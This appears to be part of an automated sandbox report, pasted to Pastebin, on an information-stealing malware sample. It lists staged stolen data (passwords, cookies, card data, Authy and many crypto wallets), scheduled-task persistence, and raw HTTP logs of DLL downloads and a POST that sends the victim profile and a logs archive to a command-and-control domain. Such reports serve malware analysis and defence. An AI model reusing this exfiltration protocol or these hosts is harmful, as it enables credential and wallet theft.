  724. "C:\\Users\\user\\AppData\\Roaming\\Intel Rapid\\IntelRapid.exe",
  725. "\\??\\PIPE\\srvsvc",
  726. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\IntelRapid.lnk",
  727. "C:\\Windows\\sysnative\\Tasks\\Intel Rapid",
  728. "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
  729. "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
  730. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
  731. "\\??\\WMIDataDevice",
  732. "\\??\\PIPE\\samr",
  733. "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
  734. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
  735. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
  736. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
  737. "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
  738. "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
  739. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
  740. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
  741.  
  742.  
  743. * Deleted Files:
  744. "C:\\ProgramData\\freebl3.dll",
  745. "C:\\ProgramData\\mozglue.dll",
  746. "C:\\ProgramData\\msvcp140.dll",
  747. "C:\\ProgramData\\nss3.dll",
  748. "C:\\ProgramData\\softokn3.dll",
  749. "C:\\ProgramData\\vcruntime140.dll",
  750. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Autofill\\Google Chrome_Default.txt",
  751. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Autofill",
  752. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\CC\\Google Chrome_Default.txt",
  753. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\CC",
  754. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies\\Edge_Cookies.txt",
  755. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies\\Google Chrome_Default.txt",
  756. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies\\IE_Cookies.txt",
  757. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies",
  758. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\cookie_list.txt",
  759. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Downloads\\Google Chrome_Default.txt",
  760. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Downloads",
  761. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Files\\Files.zip",
  762. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Files\\Files3.zip",
  763. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Files",
  764. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\History\\Google Chrome_Default.txt",
  765. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\History",
  766. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\information.txt",
  767. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\outlook.txt",
  768. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\passwords.txt",
  769. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Soft\\Authy",
  770. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Soft",
  771. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Anoncoin",
  772. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\BBQCoin",
  773. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Bitcoin",
  774. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DashCore",
  775. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DevCoin",
  776. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DigitalCoin",
  777. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\ElectronCash",
  778. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Electrum",
  779. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\ElectrumLTC",
  780. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Ethereum",
  781. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Exodus",
  782. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\FlorinCoin",
  783. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Franko",
  784. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\FreiCoin",
  785. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\GoldCoinGLD",
  786. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\InfiniteCoin",
  787. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\IOCoin",
  788. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\IxCoin",
  789. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\JAXX",
  790. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Litecoin",
  791. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MegaCoin",
  792. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MinCoin",
  793. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MultiDoge",
  794. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\NameCoin",
  795. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\PrimeCoin",
  796. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\TerraCoin",
  797. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\YACoin",
  798. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Zcash",
  799. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets",
  800. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\US_00000000-0000-0000-0000-0000000000006747247925.zip",
  801. "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_8874219db6846885b78323d8de8249d1.exe",
  802. "C:\\Windows\\Tasks\\Intel Rapid.job",
  803. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
  804.  
  805.  
  806. * Modified Registry Keys:
  807. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  808. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4162F30D-5B2A-4A6C-8437-716EB3FBAE8B\\Path",
  809. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4162F30D-5B2A-4A6C-8437-716EB3FBAE8B\\Hash",
  810. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Intel Rapid\\Id",
  811. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Intel Rapid\\Index",
  812. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4162F30D-5B2A-4A6C-8437-716EB3FBAE8B\\Triggers",
  813. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4162F30D-5B2A-4A6C-8437-716EB3FBAE8B\\DynamicInfo",
  814. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
  815. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
  816. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
  817. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
  818. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
  819. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
  820. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
  821. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
  822. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
  823. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
  824. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider"
  825.  
  826.  
  827. * Deleted Registry Keys:
  828. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\Intel Rapid.job",
  829. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\Intel Rapid.job.fp"
  830.  
  831.  
  832. * DNS Communications:
  833.  
  834. "type": "A",
  835. "request": "earphorialofts.net",
  836. "answers":
  837.  
  838. "data": "185.99.133.219",
  839. "type": "A"
  840.  
  841.  
  842.  
  843.  
  844. "type": "A",
  845. "request": "ip-api.com",
  846. "answers":
  847.  
  848. "data": "72.11.140.50",
  849. "type": "A"
  850.  
  851.  
  852. "data": "66.212.29.250",
  853. "type": "A"
  854.  
  855.  
  856.  
  857.  
  858. "type": "A",
  859. "request": "neecopower.com",
  860. "answers":
  861.  
  862. "data": "66.165.234.34",
  863. "type": "A"
  864.  
  865.  
  866.  
  867.  
  868.  
  869. * Domains:
  870.  
  871. "ip": "66.165.234.34",
  872. "domain": "neecopower.com"
  873.  
  874.  
  875. "ip": "185.99.133.219",
  876. "domain": "earphorialofts.net"
  877.  
  878.  
  879. "ip": "66.212.29.250",
  880. "domain": "ip-api.com"
  881.  
  882.  
  883.  
  884. * Network Communication - ICMP:
  885.  
  886. * Network Communication - HTTP:
  887.  
  888. "count": 1,
  889. "body": "--1BEF0A57BE110FD467A--\r\n",
  890. "uri": "http://earphorialofts.net/72",
  891. "user-agent": "",
  892. "method": "POST",
  893. "host": "earphorialofts.net",
  894. "version": "1.1",
  895. "path": "/72",
  896. "data": "POST /72 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: earphorialofts.net\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  897. "port": 80
  898.  
  899.  
  900. "count": 1,
  901. "body": "",
  902. "uri": "http://earphorialofts.net/freebl3.dll",
  903. "user-agent": "",
  904. "method": "GET",
  905. "host": "earphorialofts.net",
  906. "version": "1.1",
  907. "path": "/freebl3.dll",
  908. "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: earphorialofts.net\r\nConnection: Keep-Alive\r\n\r\n",
  909. "port": 80
  910.  
  911.  
  912. "count": 1,
  913. "body": "",
  914. "uri": "http://earphorialofts.net/mozglue.dll",
  915. "user-agent": "",
  916. "method": "GET",
  917. "host": "earphorialofts.net",
  918. "version": "1.1",
  919. "path": "/mozglue.dll",
  920. "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: earphorialofts.net\r\nConnection: Keep-Alive\r\n\r\n",
  921. "port": 80
  922.  
  923.  
  924. "count": 2,
  925. "body": "",
  926. "uri": "http://earphorialofts.net/msvcp140.dll",
  927. "user-agent": "",
  928. "method": "GET",
  929. "host": "earphorialofts.net",
  930. "version": "1.1",
  931. "path": "/msvcp140.dll",
  932. "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: earphorialofts.net\r\nConnection: Keep-Alive\r\n\r\n",
  933. "port": 80
  934.  
  935.  
  936. "count": 1,
  937. "body": "",
  938. "uri": "http://earphorialofts.net/nss3.dll",
  939. "user-agent": "",
  940. "method": "GET",
  941. "host": "earphorialofts.net",
  942. "version": "1.1",
  943. "path": "/nss3.dll",
  944. "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: earphorialofts.net\r\nConnection: Keep-Alive\r\n\r\n",
  945. "port": 80
  946.  
  947.  
  948. "count": 1,
  949. "body": "",
  950. "uri": "http://earphorialofts.net/softokn3.dll",
  951. "user-agent": "",
  952. "method": "GET",
  953. "host": "earphorialofts.net",
  954. "version": "1.1",
  955. "path": "/softokn3.dll",
  956. "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: earphorialofts.net\r\nConnection: Keep-Alive\r\n\r\n",
  957. "port": 80
  958.  
  959.  
  960. "count": 1,
  961. "body": "",
  962. "uri": "http://earphorialofts.net/vcruntime140.dll",
  963. "user-agent": "",
  964. "method": "GET",
  965. "host": "earphorialofts.net",
  966. "version": "1.1",
  967. "path": "/vcruntime140.dll",
  968. "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: earphorialofts.net\r\nConnection: Keep-Alive\r\n\r\n",
  969. "port": 80
  970.  
  971.  
  972. "count": 2,
  973. "body": "--1BEF0A57BE110FD467A--\r\n",
  974. "uri": "http://ip-api.com/line/",
  975. "user-agent": "",
  976. "method": "POST",
  977. "host": "ip-api.com",
  978. "version": "1.1",
  979. "path": "/line/",
  980. "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  981. "port": 80
  982.  
  983.  
  984. "count": 1,
  985. "body": "",
  986. "uri": "http://earphorialofts.net/",
  987. "user-agent": "",
  988. "method": "POST",
  989. "host": "earphorialofts.net",
  990. "version": "1.1",
  991. "path": "/",
  992. "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 5111\r\nHost: earphorialofts.net\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
  993. "port": 80
  994.  
  995.  
  996. "count": 2,
  997. "body": "",
  998. "uri": "http://earphorialofts.net/",
  999. "user-agent": "",
  1000. "method": "POST",
  1001. "host": "earphorialofts.net",
  1002. "version": "1.1",
  1003. "path": "/",
  1004. "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 5111\r\nHost: earphorialofts.net\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"hwid\"\r\n\r\n00000000-0000-0000-0000-000000000000\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"os\"\r\n\r\nWindows 7 Enterprise N\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"platform\"\r\n\r\nx64\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"profile\"\r\n\r\n72\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"user\"\r\n\r\nuser\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"cccount\"\r\n\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"fcount\"\r\n\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"telegram\"\r\n\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"ver\"\r\n\r\n12.1\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"ccount\"\r\n\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"logs\"; filename=\"US_c1515a12-",
  1005. "port": 80
  1006.  
  1007.  
  1008. "count": 2,
  1009. "body": "",
  1010. "uri": "http://neecopower.com/wp-content/uploads/2019/08/client_only_64.exe",
  1011. "user-agent": "",
  1012. "method": "GET",
  1013. "host": "neecopower.com",
  1014. "version": "1.1",
  1015. "path": "/wp-content/uploads/2019/08/client_only_64.exe",
  1016. "data": "GET /wp-content/uploads/2019/08/client_only_64.exe HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: neecopower.com\r\nConnection: Keep-Alive\r\n\r\n",
  1017. "port": 80
  1018.  
  1019.  
  1020.  
  1021. * Network Communication - SMTP:
  1022.  
  1023. * Network Communication - Hosts:
  1024.  
  1025. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!